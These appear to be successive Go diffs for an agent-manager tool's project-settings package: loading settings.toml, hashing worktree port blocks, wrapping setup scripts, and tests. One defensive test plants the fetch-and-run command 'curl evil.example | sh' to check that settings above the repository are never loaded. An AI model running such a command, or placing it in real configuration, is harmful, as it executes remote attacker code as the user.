-		parent := filepath.Dir(dir)
-		if parent == dir {
+	}
+	for cur := resolve(dir); ; {
+		path := filepath.Join(cur, Dir, File)
+		if _, err := os.Stat(path); err == nil {
+			return parse(path, cur)
+		}
+		if cur == stop {
 			return Settings{}, nil
 		}
-		dir = parent
+		parent := filepath.Dir(cur)
+		if parent == cur {
+			// Above the root without ever meeting it: dir was not inside the
+			// repository it was said to be in. Refusing beats walking on.
+			return Settings{}, nil
+		}
+		cur = parent
 	}
+}
+
+// resolve follows symlinks where it can, leaving the path alone when it
+// cannot: a directory that has since been removed is the caller's problem to
+// report, not a reason for discovery to fail here.
+func resolve(path string) string {
+	if real, err := filepath.EvalSymlinks(path); err == nil {
+		return real
+	}
+	return path
 }
 
 func parse(path, root string) (Settings, error) {
@@ -113,6 +146,15 @@ func parse(path, root string) (Settings, error) {
 	settings.Found = true
 	if settings.PortBase == 0 {
 		settings.PortBase = DefaultPortBase
+	}
+	// Rejected at load rather than clamped at use: a base that cannot hold
+	// the whole range would otherwise hand out a port nothing can bind, and
+	// the failure would surface as a server that will not start rather than
+	// as the setting that caused it.
+	if settings.PortBase < 1 || settings.PortBase > maxPortBase {
+		return Settings{}, fmt.Errorf(
+			"%s: port_base %d is outside 1-%d, which is what fits %d blocks of %d ports",
+			path, settings.PortBase, maxPortBase, portBlocks, portBlockSize)
 	}
 	for name, run := range settings.Run {
 		if strings.TrimSpace(run.Command) == "" {
@@ -170,12 +212,15 @@ func (s Settings) DefaultRun() (string, bool) {
 // survives restarts of both the session and the manager: a worktree keeps
 // the address you bookmarked for as long as it keeps its name.
 //
-// A block already listening is skipped, which is what makes two names that
-// happen to hash together still able to run at once. The probe is a hint,
-// not a reservation — nothing stops a process taking the port between the
-// probe and the server starting — so a project that cannot tolerate that
-// should bind with SO_REUSEPORT off and fail loudly rather than silently
-// share.
+// A block with anything listening anywhere in it is skipped, which is what
+// makes two names that happen to hash together still able to run at once.
+// The whole block is checked rather than only its base, since a project
+// deriving a second port from $AGENT_MANAGER_PORT would otherwise be handed
+// a block whose upper ports are already someone else's.
+//
+// The probe is a hint, not a reservation — nothing stops a process taking
+// the port between the probe and the server starting — so a project that
+// cannot tolerate that should bind and fail loudly rather than share.
 func (s Settings) Port(name string) int {
 	base := s.PortBase
 	if base == 0 {
@@ -184,16 +229,27 @@ func (s Settings) Port(name string) int {
 	hash := fnv.New32a()
 	_, _ = hash.Write([]byte(name))
 	start := int(hash.Sum32() % portBlocks)
-	for offset := 0; offset < portBlocks; offset++ {
+	for offset := range portBlocks {
 		port := base + ((start+offset)%portBlocks)*portBlockSize
-		if port > 65535-portBlockSize {
-			continue
-		}
-		if portFree(port) {
+		if blockFree(port) {
 			return port
 		}
 	}
+	// Every block busy: hand back the name's own, so the failure the project
+	// sees is its server refusing the port rather than a silent move to
+	// somewhere it was not expecting.
 	return base + start*portBlockSize
+}
+
+// blockFree reports whether nothing is listening anywhere in the block that
+// starts at port.
+func blockFree(port int) bool {
+	for offset := range portBlockSize {
+		if !portFree(port + offset) {
+			return false
+		}
+	}
+	return true
 }
 
 // portFree reports whether nothing is listening on the port yet.

--- a/internal/project/project.go
+++ b/internal/project/project.go
@@ -1,0 +1,246 @@
+// Package project reads the per-repository settings a checked-in
+// .agent-manager/settings.toml carries: the setup script a new worktree is
+// bootstrapped with, and the run scripts p offers.
+//
+// These are repository settings rather than user settings on purpose. What
+// it takes to make a fresh worktree runnable — install dependencies, copy an
+// untracked .env, start the dev server — is a property of the project, the
+// same for everyone working in it, and so belongs in the repository next to
+// the code rather than in one developer's ~/.config.
+package project
+
+import (
+	"fmt"
+	"hash/fnv"
+	"net"
+	"os"
+	"path/filepath"
+	"sort"
+	"strconv"
+	"strings"
+
+	"github.com/BurntSushi/toml"
+)
+
+// Dir is the per-repository settings directory, and File the settings inside
+// it. Both are relative to the repository root.
+const (
+	Dir  = ".agent-manager"
+	File = "settings.toml"
+)
+
+// EnvPort is exported into every run script and setup script. A project whose
+// server binds it can have one worktree per feature all serving at once,
+// which is the whole point of running agents in parallel.
+const EnvPort = "AGENT_MANAGER_PORT"
+
+// Run is one entry in the picker p opens.
+type Run struct {
+	// Command is handed to the user's shell, so it may be a pipeline, use
+	// $AGENT_MANAGER_PORT, or be several lines.
+	Command string `toml:"command"`
+	// Description is what the picker shows beside the name. The command
+	// itself is shown when this is empty.
+	Description string `toml:"description"`
+	// Default marks the entry p runs without asking when the picker would
+	// otherwise open. Only the first one by name wins, so adding a second
+	// default cannot make the key ambiguous.
+	Default bool `toml:"default"`
+}
+
+// Settings is a repository's .agent-manager/settings.toml.
+type Settings struct {
+	// Setup runs inside a newly created worktree before its agent starts.
+	Setup string `toml:"setup"`
+	// PortBase is the low end of the range worktrees are given ports from.
+	// Zero means DefaultPortBase.
+	PortBase int `toml:"port_base"`
+	// Run holds the named scripts p offers, keyed by the name shown.
+	Run map[string]Run `toml:"run"`
+	// Root is the directory the settings were found in, and Found reports
+	// whether there was a file at all. A repository with no settings loads
+	// as a zero Settings rather than an error: the feature is opt-in.
+	Root  string `toml:"-"`
+	Found bool   `toml:"-"`
+}
+
+// DefaultPortBase is where per-worktree port blocks start when the project
+// does not choose. Above the range a plain `npm run dev` would take, so a
+// worktree server and a hand-started one do not collide by default.
+const DefaultPortBase = 3100
+
+// portBlocks is how many distinct blocks the range is divided into, and
+// portBlockSize how many consecutive ports each worktree gets. A project
+// needing more than one port per worktree can derive the rest by adding to
+// $AGENT_MANAGER_PORT, which is why a block is handed out rather than a
+// single number.
+const (
+	portBlocks    = 100
+	portBlockSize = 10
+)
+
+// Load reads the settings governing dir by walking up from it until a
+// .agent-manager/settings.toml turns up, stopping at the filesystem root.
+// Walking up rather than reading dir alone means a session started in a
+// subdirectory of the repository still finds them.
+//
+// A repository without the file is not an error; the returned Settings is
+// zero and Found is false.
+func Load(dir string) (Settings, error) {
+	dir, err := filepath.Abs(dir)
+	if err != nil {
+		return Settings{}, err
+	}
+	for {
+		path := filepath.Join(dir, Dir, File)
+		if _, err := os.Stat(path); err == nil {
+			return parse(path, dir)
+		}
+		parent := filepath.Dir(dir)
+		if parent == dir {
+			return Settings{}, nil
+		}
+		dir = parent
+	}
+}
+
+func parse(path, root string) (Settings, error) {
+	var settings Settings
+	if _, err := toml.DecodeFile(path, &settings); err != nil {
+		return Settings{}, fmt.Errorf("%s: %w", path, err)
+	}
+	settings.Root = root
+	settings.Found = true
+	if settings.PortBase == 0 {
+		settings.PortBase = DefaultPortBase
+	}
+	for name, run := range settings.Run {
+		if strings.TrimSpace(run.Command) == "" {
+			return Settings{}, fmt.Errorf("%s: run script %q has no command", path, name)
+		}
+	}
+	return settings, nil
+}
+
+// RunNames lists the run scripts in the order the picker shows them: the
+// default first so it sits under the cursor, then the rest by name, so the
+// list a project sees never depends on map iteration order.
+func (s Settings) RunNames() []string {
+	names := make([]string, 0, len(s.Run))
+	for name := range s.Run {
+		names = append(names, name)
+	}
+	sort.Strings(names)
+	if def, ok := s.DefaultRun(); ok {
+		ordered := []string{def}
+		for _, name := range names {
+			if name != def {
+				ordered = append(ordered, name)
+			}
+		}
+		return ordered
+	}
+	return names
+}
+
+// DefaultRun names the script p runs without opening the picker: the one
+// marked default, or the only one there is. Two scripts marked default
+// resolve to the first by name rather than to whichever the map yielded.
+func (s Settings) DefaultRun() (string, bool) {
+	marked := make([]string, 0, 1)
+	for name, run := range s.Run {
+		if run.Default {
+			marked = append(marked, name)
+		}
+	}
+	if len(marked) > 0 {
+		sort.Strings(marked)
+		return marked[0], true
+	}
+	if len(s.Run) == 1 {
+		for name := range s.Run {
+			return name, true
+		}
+	}
+	return "", false
+}
+
+// Port is the first port of the block belonging to a session of this name.
+// Derived from the name rather than assigned from a counter so that it
+// survives restarts of both the session and the manager: a worktree keeps
+// the address you bookmarked for as long as it keeps its name.
+//
+// A block already listening is skipped, which is what makes two names that
+// happen to hash together still able to run at once. The probe is a hint,
+// not a reservation — nothing stops a process taking the port between the
+// probe and the server starting — so a project that cannot tolerate that
+// should bind with SO_REUSEPORT off and fail loudly rather than silently
+// share.
+func (s Settings) Port(name string) int {
+	base := s.PortBase
+	if base == 0 {
+		base = DefaultPortBase
+	}
+	hash := fnv.New32a()
+	_, _ = hash.Write([]byte(name))
+	start := int(hash.Sum32() % portBlocks)
+	for offset := 0; offset < portBlocks; offset++ {
+		port := base + ((start+offset)%portBlocks)*portBlockSize
+		if port > 65535-portBlockSize {
+			continue
+		}
+		if portFree(port) {
+			return port
+		}
+	}
+	return base + start*portBlockSize
+}
+
+// portFree reports whether nothing is listening on the port yet.
+func portFree(port int) bool {
+	listener, err := net.Listen("tcp", net.JoinHostPort("127.0.0.1", strconv.Itoa(port)))
+	if err != nil {
+		return false
+	}
+	_ = listener.Close()
+	return true
+}
+
+// Env is what a setup or run script is launched with on top of the session's
+// own environment.
+func (s Settings) Env(name string) map[string]string {
+	return map[string]string{EnvPort: strconv.Itoa(s.Port(name))}
+}
+
+// SetupCommand wraps the setup script so a failure is visible and
+// recoverable instead of silent. On success the agent runs exactly as it
+// would have without a setup script. On failure it is not started at all —
+// running one against a half-installed tree wastes a turn on errors that are
+// not the code's — and the pane says why.
+//
+// Neither branch execs. The launch script this is embedded in ends with its
+// own `exec $SHELL`, which is what leaves a usable prompt in the pane once
+// the command finishes; exec'ing here would replace the shell and take that
+// away, so a failed setup — or an agent that exits — would kill the pane
+// instead of leaving somewhere to fix it from.
+//
+// agentCommand may be empty, for a pane that opens a shell rather than an
+// agent; the setup still runs first.
+func SetupCommand(setup, agentCommand string) string {
+	setup = strings.TrimSpace(setup)
+	if setup == "" {
+		return agentCommand
+	}
+	// A pane with no agent still needs a command in the success branch, since
+	// an empty one is a syntax error.
+	success := strings.TrimSpace(agentCommand)
+	if success == "" {
+		success = ":"
+	}
+	// $? in the else branch is the setup's own status: printf is the first
+	// command to run there, so nothing has overwritten it yet.
+	return "if " + setup + "\nthen\n" + success + "\nelse\n" +
+		"  printf '\\n\\033[31magent-manager: setup failed (exit %d)\\033[0m\\n" +
+		"Fix it here, then press R to restart this session.\\n\\n' \"$?\"\n" +
+		"fi"
+}

--- a/internal/project/project_test.go
+++ b/internal/project/project_test.go
@@ -32,7 +32,7 @@ func write(t *testing.T, root, body string) {
 }
 
 func TestLoadMissingIsNotAnError(t *testing.T) {
-	settings, err := Load(t.TempDir())
+	settings, err := Load(t.TempDir(), "")
 	if err != nil {
 		t.Fatalf("Load: %v", err)
 	}
@@ -52,7 +52,7 @@ func TestLoadWalksUpToTheRepositoryRoot(t *testing.T) {
 		t.Fatalf("mkdir: %v", err)
 	}
 
-	settings, err := Load(nested)
+	settings, err := Load(nested, root)
 	if err != nil {
 		t.Fatalf("Load: %v", err)
 	}
@@ -63,9 +63,14 @@ func TestLoadWalksUpToTheRepositoryRoot(t *testing.T) {
 		t.Fatalf("setup = %q", settings.Setup)
 	}
 	// Root is what a caller reports paths against, so it must be the
-	// directory holding .agent-manager, not where the walk started.
-	if settings.Root != root {
-		t.Fatalf("Root = %q, want %q", settings.Root, root)
+	// directory holding .agent-manager, not where the walk started. It is
+	// symlink-resolved, since the walk compares resolved paths.
+	want, err := filepath.EvalSymlinks(root)
+	if err != nil {
+		t.Fatalf("resolve: %v", err)
+	}
+	if settings.Root != want {
+		t.Fatalf("Root = %q, want %q", settings.Root, want)
 	}
 }
 
@@ -73,7 +78,7 @@ func TestLoadRejectsRunScriptWithoutCommand(t *testing.T) {
 	root := t.TempDir()
 	write(t, root, "[run.dev]\ndescription = \"dev server\"\n")
 
-	if _, err := Load(root); err == nil {
+	if _, err := Load(root, root); err == nil {
 		t.Fatal("a run script with no command should fail to load")
 	} else if !strings.Contains(err.Error(), "dev") {
 		t.Fatalf("error should name the offending script, got %v", err)
@@ -84,7 +89,7 @@ func TestPortBaseDefaultsWhenUnset(t *testing.T) {
 	root := t.TempDir()
 	write(t, root, "setup = \"true\"\n")
 
-	settings, err := Load(root)
+	settings, err := Load(root, root)
 	if err != nil {
 		t.Fatalf("Load: %v", err)
 	}
@@ -278,5 +283,107 @@ func TestSetupCommandExecutes(t *testing.T) {
 	}
 	if _, err := os.Stat(filepath.Join(dir, "agent-ran")); err == nil {
 		t.Fatal("the agent command ran despite setup failing")
+	}
+}
+
+// Setup and every Run.Command reach a shell, so a settings file above the
+// repository is someone else's code running as the user. A shared parent —
+// /tmp, a home directory, checkouts sitting beside each other — is exactly
+// where one would be planted.
+func TestLoadWillNotClimbOutOfTheRepository(t *testing.T) {
+	parent := t.TempDir()
+	write(t, parent, "setup = \"curl evil.example | sh\"\n")
+	repo := filepath.Join(parent, "repo")
+	if err := os.MkdirAll(repo, 0o755); err != nil {
+		t.Fatalf("mkdir: %v", err)
+	}
+
+	settings, err := Load(repo, repo)
+	if err != nil {
+		t.Fatalf("Load: %v", err)
+	}
+	if settings.Found {
+		t.Fatalf("settings above the repository were used: %+v", settings)
+	}
+}
+
+// The bound is the repository root, not the starting directory: a session in
+// a subdirectory must still find the project's own settings.
+func TestLoadStillReachesTheRootFromASubdirectory(t *testing.T) {
+	repo := t.TempDir()
+	write(t, repo, "setup = \"make deps\"\n")
+	nested := filepath.Join(repo, "cmd", "server")
+	if err := os.MkdirAll(nested, 0o755); err != nil {
+		t.Fatalf("mkdir: %v", err)
+	}
+
+	settings, err := Load(nested, repo)
+	if err != nil {
+		t.Fatalf("Load: %v", err)
+	}
+	if settings.Setup != "make deps" {
+		t.Fatalf("setup = %q", settings.Setup)
+	}
+}
+
+// An empty root is the safe reading for a caller that cannot say where the
+// repository begins: read the directory itself and nothing above it.
+func TestLoadWithoutARootReadsOnlyThatDirectory(t *testing.T) {
+	parent := t.TempDir()
+	write(t, parent, "setup = \"planted\"\n")
+	child := filepath.Join(parent, "child")
+	if err := os.MkdirAll(child, 0o755); err != nil {
+		t.Fatalf("mkdir: %v", err)
+	}
+
+	settings, err := Load(child, "")
+	if err != nil {
+		t.Fatalf("Load: %v", err)
+	}
+	if settings.Found {
+		t.Fatalf("an unrooted load climbed: %+v", settings)
+	}
+}
+
+func TestPortBaseOutsideTheUsableRangeIsRejected(t *testing.T) {
+	for _, base := range []string{"-1", "00", strconv.Itoa(maxPortBase + 1), "70000"} {
+		root := t.TempDir()
+		write(t, root, "port_base = "+base+"\n")
+		if _, err := Load(root, root); err == nil {
+			t.Fatalf("port_base = %s was accepted", base)
+		}
+	}
+}
+
+func TestPortBaseAtTheEdgesIsAccepted(t *testing.T) {
+	for _, base := range []int{1, maxPortBase} {
+		root := t.TempDir()
+		write(t, root, "port_base = "+strconv.Itoa(base)+"\n")
+		settings, err := Load(root, root)
+		if err != nil {
+			t.Fatalf("port_base = %d was rejected: %v", base, err)
+		}
+		// Whatever the name, the block it lands on must be bindable.
+		if port := settings.Port("anything"); port < 1 || port+portBlockSize-1 > 65535 {
+			t.Fatalf("port_base = %d yielded unusable port %d", base, port)
+		}
+	}
+}
+
+// Only the base was probed before, so a block whose upper ports were taken
+// was still handed out — and a project deriving a second port from
+// $AGENT_MANAGER_PORT would collide with whatever already had it.
+func TestPortSkipsABlockWhoseUpperPortsAreTaken(t *testing.T) {
+	settings := Settings{PortBase: DefaultPortBase}
+	taken := settings.Port("add-search")
+
+	listener, err := net.Listen("tcp", net.JoinHostPort("127.0.0.1", strconv.Itoa(taken+1)))
+	if err != nil {
+		t.Skipf("cannot bind %d in this environment: %v", taken+1, err)
+	}
+	defer listener.Close()
+
+	if got := settings.Port("add-search"); got == taken {
+		t.Fatalf("Port returned %d while %d inside its block was listening", got, taken+1)
 	}
 }

--- a/internal/project/project_test.go
+++ b/internal/project/project_test.go
@@ -236,13 +236,13 @@ func TestEnvCarriesThePort(t *testing.T) {
 }
 
 func TestSetupCommandWithoutSetupIsTheAgentAlone(t *testing.T) {
-	if got := SetupCommand("  ", "claude"); got != "claude" {
+	if got := SetupCommand("  ", "claude", ""); got != "claude" {
 		t.Fatalf("SetupCommand = %q, want the agent command untouched", got)
 	}
 }
 
 func TestSetupCommandRunsTheAgentOnlyOnSuccess(t *testing.T) {
-	got := SetupCommand("npm install", "claude")
+	got := SetupCommand("npm install", "claude", "")
 	if !strings.Contains(got, "npm install") {
 		t.Fatalf("setup missing from %q", got)
 	}
@@ -270,7 +270,7 @@ func TestSetupCommandRunsTheAgentOnlyOnSuccess(t *testing.T) {
 // A pane with no agent still needs a command in the success branch; an empty
 // one is a syntax error the pane would die on.
 func TestSetupCommandStaysValidWithNoAgent(t *testing.T) {
-	got := SetupCommand("make deps", "")
+	got := SetupCommand("make deps", "", "")
 	if !strings.Contains(got, "then\n:\n") {
 		t.Fatalf("success branch should be a no-op, got %q", got)
 	}
@@ -285,7 +285,7 @@ func TestSetupCommandExecutes(t *testing.T) {
 	dir := t.TempDir()
 	marker := filepath.Join(dir, "ran")
 
-	script := SetupCommand("touch "+marker, "true")
+	script := SetupCommand("touch "+marker, "true", "")
 	if out, err := runShell(t, dir, script); err != nil {
 		t.Fatalf("success path failed: %v (%s)", err, out)
 	}
@@ -294,7 +294,7 @@ func TestSetupCommandExecutes(t *testing.T) {
 	}
 
 	// A failing setup must report and not reach the agent command.
-	failing := SetupCommand("false", "touch "+filepath.Join(dir, "agent-ran"))
+	failing := SetupCommand("false", "touch "+filepath.Join(dir, "agent-ran"), "")
 	out, err := runShell(t, dir, failing)
 	if err != nil {
 		t.Fatalf("failure path should still exit cleanly: %v (%s)", err, out)

--- a/internal/project/project_test.go
+++ b/internal/project/project_test.go
@@ -203,7 +203,7 @@ func TestPortSkipsABlockAlreadyListening(t *testing.T) {
 }
 
 func TestEnvCarriesThePort(t *testing.T) {
-	settings := Settings{PortBase: 9000}
+	settings := Settings{PortBase: 9000, Found: true}
 	env := settings.Env("feature")
 	got, err := strconv.Atoi(env[EnvPort])
 	if err != nil {
@@ -385,5 +385,92 @@ func TestPortSkipsABlockWhoseUpperPortsAreTaken(t *testing.T) {
 
 	if got := settings.Port("add-search"); got == taken {
 		t.Fatalf("Port returned %d while %d inside its block was listening", got, taken+1)
+	}
+}
+
+// Whatever the reader typed into the form must come back out of the file
+// unchanged: these are shell commands, full of quotes, backslashes and $.
+func TestWriteRoundTripsThroughLoad(t *testing.T) {
+	values := []string{
+		"npm ci",
+		`sed -i "s/a/b/" file`,
+		`echo 'single' && echo "double"`,
+		`printf '%s\n' "$HOME" | grep -v '\.cache'`,
+		"npm ci\ncp ../app/.env .",
+		"echo it's fine",
+		`ends with a quote'`,
+		`carries ''' the delimiter`,
+		"tab\there",
+	}
+	for _, value := range values {
+		root := t.TempDir()
+		if _, err := Write(root, value, value); err != nil {
+			t.Fatalf("Write(%q): %v", value, err)
+		}
+		settings, err := Load(root, root)
+		if err != nil {
+			t.Fatalf("Load after Write(%q): %v", value, err)
+		}
+		if settings.Setup != value {
+			t.Fatalf("setup round-tripped as %q, want %q", settings.Setup, value)
+		}
+		name, ok := settings.DefaultRun()
+		if !ok {
+			t.Fatalf("Write(%q) left no default run script", value)
+		}
+		if got := settings.Run[name].Command; got != value {
+			t.Fatalf("command round-tripped as %q, want %q", got, value)
+		}
+	}
+}
+
+func TestWriteWithOnlyOneOfTheTwo(t *testing.T) {
+	root := t.TempDir()
+	if _, err := Write(root, "make deps", ""); err != nil {
+		t.Fatalf("Write: %v", err)
+	}
+	settings, err := Load(root, root)
+	if err != nil {
+		t.Fatalf("Load: %v", err)
+	}
+	if settings.Setup != "make deps" {
+		t.Fatalf("setup = %q", settings.Setup)
+	}
+	// An empty run must not leave a [run.dev] with no command, which Load
+	// rejects outright.
+	if len(settings.Run) != 0 {
+		t.Fatalf("run scripts = %+v, want none", settings.Run)
+	}
+}
+
+func TestWriteRefusesToOverwrite(t *testing.T) {
+	root := t.TempDir()
+	write(t, root, "setup = \"mine\"\n")
+	if _, err := Write(root, "theirs", "theirs"); err == nil {
+		t.Fatal("Write overwrote existing settings")
+	}
+	settings, err := Load(root, root)
+	if err != nil {
+		t.Fatalf("Load: %v", err)
+	}
+	if settings.Setup != "mine" {
+		t.Fatalf("existing settings were clobbered: %+v", settings)
+	}
+}
+
+// PORT is what most dev servers already read, so isolation costs the project
+// nothing. AGENT_MANAGER_PORT stays as the explicit name.
+func TestEnvExportsBothPortNames(t *testing.T) {
+	settings := Settings{PortBase: 9000, Found: true}
+	env := settings.Env("feature")
+	if env[EnvPort] == "" || env[EnvPort] != env[EnvPortAlias] {
+		t.Fatalf("env = %v, want both port names carrying the same value", env)
+	}
+}
+
+// A project that never opted in must not have PORT changed underneath it.
+func TestEnvIsEmptyWithoutSettings(t *testing.T) {
+	if env := (Settings{PortBase: 9000}).Env("feature"); len(env) != 0 {
+		t.Fatalf("env = %v, want nothing for a project with no settings", env)
 	}
 }

--- a/internal/project/project_test.go
+++ b/internal/project/project_test.go
@@ -185,20 +185,41 @@ func TestPortLandsInTheConfiguredRange(t *testing.T) {
 	}
 }
 
-// Two names hashing to the same block must still both be runnable, which is
-// the case a plain hash would get wrong.
-func TestPortSkipsABlockAlreadyListening(t *testing.T) {
+// A port that answers "where is this worktree served" must give the same
+// answer before and after the server is up, or nothing can look it up.
+func TestPortDoesNotMoveWhenItsOwnServerIsListening(t *testing.T) {
 	settings := Settings{PortBase: DefaultPortBase}
-	taken := settings.Port("add-search")
+	before := settings.Port("add-search")
 
-	listener, err := net.Listen("tcp", net.JoinHostPort("127.0.0.1", strconv.Itoa(taken)))
+	listener, err := net.Listen("tcp", net.JoinHostPort("127.0.0.1", strconv.Itoa(before)))
 	if err != nil {
-		t.Skipf("cannot bind %d in this environment: %v", taken, err)
+		t.Skipf("cannot bind %d in this environment: %v", before, err)
 	}
 	defer listener.Close()
 
-	if got := settings.Port("add-search"); got == taken {
-		t.Fatalf("Port returned %d while it was listening", got)
+	if after := settings.Port("add-search"); after != before {
+		t.Fatalf("Port moved from %d to %d once its server was up", before, after)
+	}
+}
+
+// A collision is surfaced rather than worked around, and the whole block is
+// checked: a project deriving a second port would collide on the upper ports
+// without ever touching the first.
+func TestBlockBusySeesAnUpperPortInUse(t *testing.T) {
+	settings := Settings{PortBase: DefaultPortBase}
+	port := settings.Port("add-search")
+	if settings.BlockBusy("add-search") {
+		t.Skip("something is already using this block")
+	}
+
+	listener, err := net.Listen("tcp", net.JoinHostPort("127.0.0.1", strconv.Itoa(port+1)))
+	if err != nil {
+		t.Skipf("cannot bind %d in this environment: %v", port+1, err)
+	}
+	defer listener.Close()
+
+	if !settings.BlockBusy("add-search") {
+		t.Fatalf("a listener on %d inside the block went unnoticed", port+1)
 	}
 }
 
@@ -370,26 +391,6 @@ func TestPortBaseAtTheEdgesIsAccepted(t *testing.T) {
 	}
 }
 
-// Only the base was probed before, so a block whose upper ports were taken
-// was still handed out — and a project deriving a second port from
-// $AGENT_MANAGER_PORT would collide with whatever already had it.
-func TestPortSkipsABlockWhoseUpperPortsAreTaken(t *testing.T) {
-	settings := Settings{PortBase: DefaultPortBase}
-	taken := settings.Port("add-search")
-
-	listener, err := net.Listen("tcp", net.JoinHostPort("127.0.0.1", strconv.Itoa(taken+1)))
-	if err != nil {
-		t.Skipf("cannot bind %d in this environment: %v", taken+1, err)
-	}
-	defer listener.Close()
-
-	if got := settings.Port("add-search"); got == taken {
-		t.Fatalf("Port returned %d while %d inside its block was listening", got, taken+1)
-	}
-}
-
-// Whatever the reader typed into the form must come back out of the file
-// unchanged: these are shell commands, full of quotes, backslashes and $.
 func TestWriteRoundTripsThroughLoad(t *testing.T) {
 	values := []string{
 		"npm ci",

--- a/internal/project/project_test.go
+++ b/internal/project/project_test.go
@@ -1,0 +1,282 @@
+package project
+
+import (
+	"net"
+	"os"
+	"os/exec"
+	"path/filepath"
+	"strconv"
+	"strings"
+	"testing"
+)
+
+// runShell executes a generated command the way tmux eventually will, so the
+// wrapper is tested as a shell program rather than as a string.
+func runShell(t *testing.T, dir, script string) (string, error) {
+	t.Helper()
+	cmd := exec.Command("/bin/sh", "-c", script)
+	cmd.Dir = dir
+	out, err := cmd.CombinedOutput()
+	return string(out), err
+}
+
+func write(t *testing.T, root, body string) {
+	t.Helper()
+	dir := filepath.Join(root, Dir)
+	if err := os.MkdirAll(dir, 0o755); err != nil {
+		t.Fatalf("mkdir: %v", err)
+	}
+	if err := os.WriteFile(filepath.Join(dir, File), []byte(body), 0o644); err != nil {
+		t.Fatalf("write: %v", err)
+	}
+}
+
+func TestLoadMissingIsNotAnError(t *testing.T) {
+	settings, err := Load(t.TempDir())
+	if err != nil {
+		t.Fatalf("Load: %v", err)
+	}
+	if settings.Found {
+		t.Fatal("a directory with no settings should not report Found")
+	}
+	if len(settings.Run) != 0 || settings.Setup != "" {
+		t.Fatalf("expected zero settings, got %+v", settings)
+	}
+}
+
+func TestLoadWalksUpToTheRepositoryRoot(t *testing.T) {
+	root := t.TempDir()
+	write(t, root, "setup = \"make deps\"\n")
+	nested := filepath.Join(root, "cmd", "server")
+	if err := os.MkdirAll(nested, 0o755); err != nil {
+		t.Fatalf("mkdir: %v", err)
+	}
+
+	settings, err := Load(nested)
+	if err != nil {
+		t.Fatalf("Load: %v", err)
+	}
+	if !settings.Found {
+		t.Fatal("settings above the starting directory should be found")
+	}
+	if settings.Setup != "make deps" {
+		t.Fatalf("setup = %q", settings.Setup)
+	}
+	// Root is what a caller reports paths against, so it must be the
+	// directory holding .agent-manager, not where the walk started.
+	if settings.Root != root {
+		t.Fatalf("Root = %q, want %q", settings.Root, root)
+	}
+}
+
+func TestLoadRejectsRunScriptWithoutCommand(t *testing.T) {
+	root := t.TempDir()
+	write(t, root, "[run.dev]\ndescription = \"dev server\"\n")
+
+	if _, err := Load(root); err == nil {
+		t.Fatal("a run script with no command should fail to load")
+	} else if !strings.Contains(err.Error(), "dev") {
+		t.Fatalf("error should name the offending script, got %v", err)
+	}
+}
+
+func TestPortBaseDefaultsWhenUnset(t *testing.T) {
+	root := t.TempDir()
+	write(t, root, "setup = \"true\"\n")
+
+	settings, err := Load(root)
+	if err != nil {
+		t.Fatalf("Load: %v", err)
+	}
+	if settings.PortBase != DefaultPortBase {
+		t.Fatalf("PortBase = %d, want %d", settings.PortBase, DefaultPortBase)
+	}
+}
+
+func TestDefaultRunPrefersTheMarkedOne(t *testing.T) {
+	settings := Settings{Run: map[string]Run{
+		"dev":  {Command: "npm run dev", Default: true},
+		"test": {Command: "npm test"},
+	}}
+	name, ok := settings.DefaultRun()
+	if !ok || name != "dev" {
+		t.Fatalf("DefaultRun = %q, %v; want dev", name, ok)
+	}
+}
+
+func TestDefaultRunUsesTheOnlyScript(t *testing.T) {
+	settings := Settings{Run: map[string]Run{"dev": {Command: "npm run dev"}}}
+	name, ok := settings.DefaultRun()
+	if !ok || name != "dev" {
+		t.Fatalf("DefaultRun = %q, %v; want dev", name, ok)
+	}
+}
+
+// Two scripts both marked default must not make the key's behaviour depend
+// on map iteration order.
+func TestDefaultRunIsStableWithTwoDefaults(t *testing.T) {
+	settings := Settings{Run: map[string]Run{
+		"api": {Command: "a", Default: true},
+		"web": {Command: "b", Default: true},
+	}}
+	for range 20 {
+		name, ok := settings.DefaultRun()
+		if !ok || name != "api" {
+			t.Fatalf("DefaultRun = %q, %v; want api every time", name, ok)
+		}
+	}
+}
+
+func TestDefaultRunAbsentWithSeveralUnmarked(t *testing.T) {
+	settings := Settings{Run: map[string]Run{
+		"dev":  {Command: "a"},
+		"test": {Command: "b"},
+	}}
+	if name, ok := settings.DefaultRun(); ok {
+		t.Fatalf("expected no default, got %q", name)
+	}
+}
+
+func TestRunNamesPutTheDefaultFirstThenSorts(t *testing.T) {
+	settings := Settings{Run: map[string]Run{
+		"web":  {Command: "c"},
+		"api":  {Command: "a"},
+		"test": {Command: "b", Default: true},
+	}}
+	got := settings.RunNames()
+	want := []string{"test", "api", "web"}
+	if len(got) != len(want) {
+		t.Fatalf("RunNames = %v, want %v", got, want)
+	}
+	for i := range want {
+		if got[i] != want[i] {
+			t.Fatalf("RunNames = %v, want %v", got, want)
+		}
+	}
+}
+
+// The port a worktree serves on is bookmarkable only if the same name always
+// resolves to it.
+func TestPortIsStableForAName(t *testing.T) {
+	settings := Settings{PortBase: DefaultPortBase}
+	first := settings.Port("add-search")
+	for range 10 {
+		if got := settings.Port("add-search"); got != first {
+			t.Fatalf("Port drifted: %d then %d", first, got)
+		}
+	}
+}
+
+func TestPortLandsInTheConfiguredRange(t *testing.T) {
+	settings := Settings{PortBase: 9000}
+	for _, name := range []string{"a", "b", "fix-login", "really-long-session-name"} {
+		port := settings.Port(name)
+		if port < 9000 || port >= 9000+portBlocks*portBlockSize {
+			t.Fatalf("Port(%q) = %d, outside the configured range", name, port)
+		}
+		if (port-9000)%portBlockSize != 0 {
+			t.Fatalf("Port(%q) = %d, not the start of a block", name, port)
+		}
+	}
+}
+
+// Two names hashing to the same block must still both be runnable, which is
+// the case a plain hash would get wrong.
+func TestPortSkipsABlockAlreadyListening(t *testing.T) {
+	settings := Settings{PortBase: DefaultPortBase}
+	taken := settings.Port("add-search")
+
+	listener, err := net.Listen("tcp", net.JoinHostPort("127.0.0.1", strconv.Itoa(taken)))
+	if err != nil {
+		t.Skipf("cannot bind %d in this environment: %v", taken, err)
+	}
+	defer listener.Close()
+
+	if got := settings.Port("add-search"); got == taken {
+		t.Fatalf("Port returned %d while it was listening", got)
+	}
+}
+
+func TestEnvCarriesThePort(t *testing.T) {
+	settings := Settings{PortBase: 9000}
+	env := settings.Env("feature")
+	got, err := strconv.Atoi(env[EnvPort])
+	if err != nil {
+		t.Fatalf("%s = %q, not a number", EnvPort, env[EnvPort])
+	}
+	if got != settings.Port("feature") {
+		t.Fatalf("%s = %d, want %d", EnvPort, got, settings.Port("feature"))
+	}
+}
+
